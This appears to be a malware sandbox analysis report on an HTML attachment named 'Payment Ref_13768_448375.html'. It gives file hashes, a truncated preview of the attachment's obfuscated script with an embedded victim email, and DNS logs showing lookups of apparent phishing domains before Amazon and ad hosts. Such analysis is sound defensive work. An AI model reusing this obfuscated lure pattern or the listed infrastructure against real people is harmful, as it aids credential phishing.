                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (538)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):2336
                                                                                                                                                                                                                                                                      Entropy (8bit):5.325315075451192
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:8qaGfCntpCntD7/V8Bd+w6jrHusTGJ0nBfdyziit8ZcHF:3aVcb66jrHuseatdyxtEcHF
                                                                                                                                                                                                                                                                      MD5:C9647D6B01E0617025076B05E7BED1EB
                                                                                                                                                                                                                                                                      SHA1:39E37C18AD6508723B664C873AFA6F02DA8D6DAE
                                                                                                                                                                                                                                                                      SHA-256:7399F4490F05A081B965475317099CCDC6245DC1FAEF8B0BC5E500E5FF5C595A
                                                                                                                                                                                                                                                                      SHA-512:C8DFDD9A1ACF05FD06F2C20D3F69B0A224AD95D6CD14B1C769D76C6C5FDAC8E9A345A5C9959DE58C32E52EAB3AF0BAB3B9B8D446A84F7B2147472232A330DC12
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/I/11mVszy8FIL.js?AUIClients/AmazonRushAssetLoader
                                                                                                                                                                                                                                                                      Preview:(function(d){var g=window.AmazonUIPageJS||window.P,q=g._namespace||g.attributeErrors,f=q?q("AmazonRushAssetLoader","AmazonRush"):g;f.guardFatal?f.guardFatal(d)(f,window):f.execute(function(){d(f,window)})})(function(d,g,q){function f(a){l&&l.count&&l.count(a,(l.count(a)||0)+1)}function m(a){return[].concat(null!==a&&void 0!==a?a:[])}function r(a,c,b){a.addEventListener?a.addEventListener("error",c,!1):a.attachEvent&&a.attachEvent("onerror",c);a.addEventListener?a.addEventListener("load",b,!1):a.attachEvent&&.a.attachEvent("onload",b)}function x(a,c,b,h,e,d){if(a){a=document.createElement("script");r(a,e,d);if(c)a.textContent=b;else{a.async=!0;if(e=h)e=-1!==b.indexOf("images/I")||/AUIClients/.test(b);e&&a.setAttribute("crossorigin","anonymous");a.src=b}b=a}else c?(c=document.createElement("style"),r(c,e,d),c.textContent=b,b=c):(c=document.createElement("link"),r(c,e,d),c.rel="stylesheet",c.href=b,b=c);(e=document.getElementsByTagName("head")[0])&&e.appendChild(b)}function k(a,c,b){retur
                                                                                                                                                                                                                                                                      File type:HTML document, ASCII text, with very long lines (2327), with no line terminators
                                                                                                                                                                                                                                                                      Entropy (8bit):5.286270115225274
                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                      • HyperText Markup Language (6006/1) 100.00%
                                                                                                                                                                                                                                                                      File name:Payment Ref_13768_448375.html
                                                                                                                                                                                                                                                                      File size:2'327 bytes
                                                                                                                                                                                                                                                                      MD5:8cba45889648b88dffd1e498d941580f
                                                                                                                                                                                                                                                                      SHA1:d579e20b4df788b23885e8e7c4d6778b0f188a64
                                                                                                                                                                                                                                                                      SHA256:1986924115fe19e2b446cd169b209a69bb2d73ff1ef93c714c11d1d8ab4d7e00
                                                                                                                                                                                                                                                                      SHA512:6f280f83296f3777f13edff2afebb960181826031539654da62526cff0da1bb7742c52abf40b6e8a7728bc413328b28c965ae430bfd665e4c00df8a9b434a1ba
                                                                                                                                                                                                                                                                      SSDEEP:48:gS0zDS99hGKLFCI+i76gr5pV3cgZ1d5RCph5686qSECy9OB9Eu3KtcDdA0qX9VLb:30zW1TLX+i6kn2MmZNV3
                                                                                                                                                                                                                                                                      TLSH:7541E9C984D33ABA2E46D0260B5BD311CB6B9F05C7E0C554548578AB8F76F487BB603A
                                                                                                                                                                                                                                                                      File Content Preview:<html> <body> <p>She designed a new logo for the company.</p> --> <script> abyssinian = `#Kcontact@johnsonsorthopedic.com`; _8x_6t4s = 'czlmbpFmb'; _58x_0q8z = `1SYil3`; _95x_8s4j = `cTM3kjMm`; _11x_3v2p = `zMjNx`; _10x_5b7s = '2YmNkJjZ'
                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:30.358052015 CEST192.168.2.51.1.1.10xd2d0Standard query (0)guiltysociety.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:30.358231068 CEST192.168.2.51.1.1.10x1b07Standard query (0)guiltysociety.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:31.096062899 CEST192.168.2.51.1.1.10x68b7Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:31.096230030 CEST192.168.2.51.1.1.10x80ceStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:31.097807884 CEST192.168.2.51.1.1.10x2e73Standard query (0)guiltysociety.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:31.097950935 CEST192.168.2.51.1.1.10x8a82Standard query (0)guiltysociety.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:32.850366116 CEST192.168.2.51.1.1.10x8bbbStandard query (0)href.liA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:32.850884914 CEST192.168.2.51.1.1.10xc995Standard query (0)href.li65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:34.570679903 CEST192.168.2.51.1.1.10x30f5Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:34.572866917 CEST192.168.2.51.1.1.10x2272Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:34.862147093 CEST192.168.2.51.1.1.10x66f9Standard query (0)7czh8.crimiti.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:34.863172054 CEST192.168.2.51.1.1.10xfc5bStandard query (0)7czh8.crimiti.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:34.884403944 CEST192.168.2.51.1.1.10x66f3Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:34.885003090 CEST192.168.2.51.1.1.10x4c22Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:36.386143923 CEST192.168.2.51.1.1.10xf11aStandard query (0)ghd.dultzman.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:36.386254072 CEST192.168.2.51.1.1.10x89c5Standard query (0)ghd.dultzman.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:36.522511005 CEST192.168.2.51.1.1.10xa5acStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:36.522969961 CEST192.168.2.51.1.1.10x518Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:39.232440948 CEST192.168.2.51.1.1.10x43beStandard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:39.232867002 CEST192.168.2.51.1.1.10x7fffStandard query (0)www.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:39.257890940 CEST192.168.2.51.1.1.10xe839Standard query (0)ghd.dultzman.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:39.258136034 CEST192.168.2.51.1.1.10x2ea9Standard query (0)ghd.dultzman.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.446085930 CEST192.168.2.51.1.1.10xd56Standard query (0)images-eu.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.446934938 CEST192.168.2.51.1.1.10xcf5Standard query (0)images-eu.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.447480917 CEST192.168.2.51.1.1.10x151eStandard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.447768927 CEST192.168.2.51.1.1.10xafebStandard query (0)m.media-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.448072910 CEST192.168.2.51.1.1.10x535Standard query (0)completion.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.448193073 CEST192.168.2.51.1.1.10xc132Standard query (0)completion.amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.214879990 CEST192.168.2.51.1.1.10x4011Standard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.215217113 CEST192.168.2.51.1.1.10x5e69Standard query (0)m.media-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.775410891 CEST192.168.2.51.1.1.10x7f80Standard query (0)images-eu.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.775692940 CEST192.168.2.51.1.1.10x9b6dStandard query (0)images-eu.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.330707073 CEST192.168.2.51.1.1.10xca9aStandard query (0)fls-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.330938101 CEST192.168.2.51.1.1.10x3f1cStandard query (0)fls-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.557074070 CEST192.168.2.51.1.1.10xe8b6Standard query (0)aax-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.557202101 CEST192.168.2.51.1.1.10xbe49Standard query (0)aax-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.827136993 CEST192.168.2.51.1.1.10x2451Standard query (0)images-eu.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.827275991 CEST192.168.2.51.1.1.10x8761Standard query (0)images-eu.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.087713003 CEST192.168.2.51.1.1.10x5112Standard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.088028908 CEST192.168.2.51.1.1.10xd680Standard query (0)www.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.142251968 CEST192.168.2.51.1.1.10xd098Standard query (0)fls-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.142431974 CEST192.168.2.51.1.1.10xa8deStandard query (0)fls-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.143740892 CEST192.168.2.51.1.1.10xe6b4Standard query (0)aax-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.143934965 CEST192.168.2.51.1.1.10x95e8Standard query (0)aax-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:45.227638006 CEST192.168.2.51.1.1.10x1262Standard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:45.227807045 CEST192.168.2.51.1.1.10xcf9aStandard query (0)m.media-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.454085112 CEST192.168.2.51.1.1.10xb4b2Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.633215904 CEST192.168.2.51.1.1.10xf31dStandard query (0)unagi-eu.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.633467913 CEST192.168.2.51.1.1.10xc28bStandard query (0)unagi-eu.amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.667860985 CEST192.168.2.51.1.1.10x7eb4Standard query (0)unagi-na.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.668289900 CEST192.168.2.51.1.1.10xa088Standard query (0)unagi-na.amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.671107054 CEST192.168.2.51.1.1.10x56aStandard query (0)aax-eu.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.671243906 CEST192.168.2.51.1.1.10x2703Standard query (0)aax-eu.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.771480083 CEST192.168.2.51.1.1.10xd494Standard query (0)aax-eu.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.771759987 CEST192.168.2.51.1.1.10x4d21Standard query (0)aax-eu.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.980531931 CEST192.168.2.51.1.1.10xedf3Standard query (0)images-na.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.981139898 CEST192.168.2.51.1.1.10xcf04Standard query (0)images-na.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.511214018 CEST192.168.2.51.1.1.10x9c71Standard query (0)aax-eu.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.511655092 CEST192.168.2.51.1.1.10xcab5Standard query (0)images-eu.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.519404888 CEST192.168.2.51.1.1.10x1fcfStandard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.567095995 CEST192.168.2.51.1.1.10xc15cStandard query (0)d1lxz4vuik53pc.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.191879034 CEST192.168.2.51.1.1.10xccdaStandard query (0)unagi-eu.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.543133020 CEST192.168.2.51.1.1.10x7de3Standard query (0)images-na.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:56.564788103 CEST192.168.2.51.1.1.10xc7fStandard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:57.892081976 CEST192.168.2.51.1.1.10xeb3aStandard query (0)aan.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:59.342267036 CEST192.168.2.51.1.1.10x8bfeStandard query (0)aax-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:59.518019915 CEST192.168.2.51.1.1.10xa8afStandard query (0)completion.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:00.181998968 CEST192.168.2.51.1.1.10x3b45Standard query (0)fls-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:03.126741886 CEST192.168.2.51.1.1.10xc44fStandard query (0)d5glw3nnbe3pc.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:03.380389929 CEST192.168.2.51.1.1.10xf543Standard query (0)aan.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:04.219361067 CEST192.168.2.51.1.1.10xd6f2Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:04.274300098 CEST192.168.2.51.1.1.10xbf28Standard query (0)unagi-na.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:04.403182983 CEST192.168.2.51.1.1.10x7bfbStandard query (0)unagi.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:07.644922018 CEST192.168.2.51.1.1.10x204dStandard query (0)redirect.prod.experiment.routing.cloudfront.aws.a2z.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.553224087 CEST192.168.2.51.1.1.10xc9cdStandard query (0)a33d5916f98192760c994c04dda69ded2.profile.cdg55-p2.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.740151882 CEST192.168.2.51.1.1.10x1450Standard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.741528988 CEST192.168.2.51.1.1.10xc1bdStandard query (0)match.360yield.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.768245935 CEST192.168.2.51.1.1.10xf66aStandard query (0)audex.userreport.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.769757032 CEST192.168.2.51.1.1.10xa1fcStandard query (0)rd.frontend.weborama.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.771496058 CEST192.168.2.51.1.1.10xdb7fStandard query (0)dsum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.772388935 CEST192.168.2.51.1.1.10x2cbfStandard query (0)rtb-csync.smartadserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.772965908 CEST192.168.2.51.1.1.10xc798Standard query (0)tags.bluekai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.773188114 CEST192.168.2.51.1.1.10xc995Standard query (0)pbs.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.774208069 CEST192.168.2.51.1.1.10xd5efStandard query (0)capi.connatix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.775824070 CEST192.168.2.51.1.1.10x8c5dStandard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.786370993 CEST192.168.2.51.1.1.10xa2d2Standard query (0)public-prod-dspcookiematching.dmxleo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:08.786406994 CEST192.168.2.51.1.1.10x168bStandard query (0)ads.stickyadstv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:09.721604109 CEST192.168.2.51.1.1.10xaf05Standard query (0)sync.rfp.fout.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:09.791414022 CEST192.168.2.51.1.1.10x47acStandard query (0)s.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:09.796791077 CEST192.168.2.51.1.1.10xf723Standard query (0)beacon.krxd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:09.812202930 CEST192.168.2.51.1.1.10x4cc9Standard query (0)x.bidswitch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:09.827789068 CEST192.168.2.51.1.1.10x95f8Standard query (0)match.sharethrough.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.506716967 CEST192.168.2.51.1.1.10xcf13Standard query (0)pixel.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.846266031 CEST192.168.2.51.1.1.10xa510Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.920769930 CEST192.168.2.51.1.1.10xc0b4Standard query (0)odr.mookie1.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.154639006 CEST192.168.2.51.1.1.10x333bStandard query (0)c1.adform.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.187268019 CEST192.168.2.51.1.1.10x783eStandard query (0)bs.serving-sys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.650440931 CEST192.168.2.51.1.1.10x3892Standard query (0)cookie-matching.mediarithmics.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.704507113 CEST192.168.2.51.1.1.10x50d4Standard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.705120087 CEST192.168.2.51.1.1.10xd7a9Standard query (0)usermatch.krxd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.174109936 CEST192.168.2.51.1.1.10x9033Standard query (0)csync.loopme.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.177700043 CEST192.168.2.51.1.1.10x70beStandard query (0)us-u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.228080988 CEST192.168.2.51.1.1.10xba60Standard query (0)ssum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.347984076 CEST192.168.2.51.1.1.10x68a8Standard query (0)lm.serving-sys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.625447035 CEST192.168.2.51.1.1.10xfd73Standard query (0)eb2.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:13.140597105 CEST192.168.2.51.1.1.10x8310Standard query (0)uipglob.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:13.696465969 CEST192.168.2.51.1.1.10x1a98Standard query (0)crb.kargo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:13.794595957 CEST192.168.2.51.1.1.10xb249Standard query (0)usersync.gumgum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:14.789326906 CEST192.168.2.51.1.1.10x44cfStandard query (0)image2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:15.218322039 CEST192.168.2.51.1.1.10xeebcStandard query (0)loadus.exelator.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:15.220407963 CEST192.168.2.51.1.1.10x6b64Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:15.315506935 CEST192.168.2.51.1.1.10x4eb4Standard query (0)completion.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:15.996397018 CEST192.168.2.51.1.1.10x94a8Standard query (0)uipus.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.276833057 CEST192.168.2.51.1.1.10x6e2fStandard query (0)sync-amazon.ads.yieldmo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.477893114 CEST192.168.2.51.1.1.10xbf87Standard query (0)images-na.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:17.184823990 CEST192.168.2.51.1.1.10x964fStandard query (0)sync.sxp.smartclip.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:17.188819885 CEST192.168.2.51.1.1.10x6ec2Standard query (0)image6.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:23.159054041 CEST192.168.2.51.1.1.10x3d12Standard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:24.144238949 CEST192.168.2.51.1.1.10xef92Standard query (0)ad4e487cdd5709cc3620784412a14d5f0.profile.bcn50-p2.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:34.979367971 CEST192.168.2.51.1.1.10x5b03Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:39.925278902 CEST192.168.2.51.1.1.10x8c23Standard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:00.404290915 CEST192.168.2.51.1.1.10x4447Standard query (0)fls-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:02.476068020 CEST192.168.2.51.1.1.10x68e3Standard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:26.637094021 CEST192.168.2.51.1.1.10x4a9fStandard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:31.639611959 CEST192.168.2.51.1.1.10x6b24Standard query (0)unagi.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:31.666910887 CEST192.168.2.51.1.1.10x6b24Standard query (0)unagi.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:31:03.405529976 CEST192.168.2.51.1.1.10x1830Standard query (0)fls-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:31:05.922787905 CEST192.168.2.51.1.1.10xd942Standard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:30.370512962 CEST1.1.1.1192.168.2.50xd2d0No error (0)guiltysociety.com69.49.245.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:31.103092909 CEST1.1.1.1192.168.2.50x68b7No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:31.103092909 CEST1.1.1.1192.168.2.50x68b7No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:31.104018927 CEST1.1.1.1192.168.2.50x80ceNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:31.112261057 CEST1.1.1.1192.168.2.50x2e73No error (0)guiltysociety.com69.49.245.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:32.858335018 CEST1.1.1.1192.168.2.50x8bbbNo error (0)href.li192.0.78.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:32.858335018 CEST1.1.1.1192.168.2.50x8bbbNo error (0)href.li192.0.78.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:34.578604937 CEST1.1.1.1192.168.2.50x30f5No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:34.579818010 CEST1.1.1.1192.168.2.50x2272No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:34.891225100 CEST1.1.1.1192.168.2.50x66f3No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:34.891225100 CEST1.1.1.1192.168.2.50x66f3No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:34.893315077 CEST1.1.1.1192.168.2.50x4c22No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:34.904242992 CEST1.1.1.1192.168.2.50xfc5bNo error (0)7czh8.crimiti.com65IN (0x0001)false
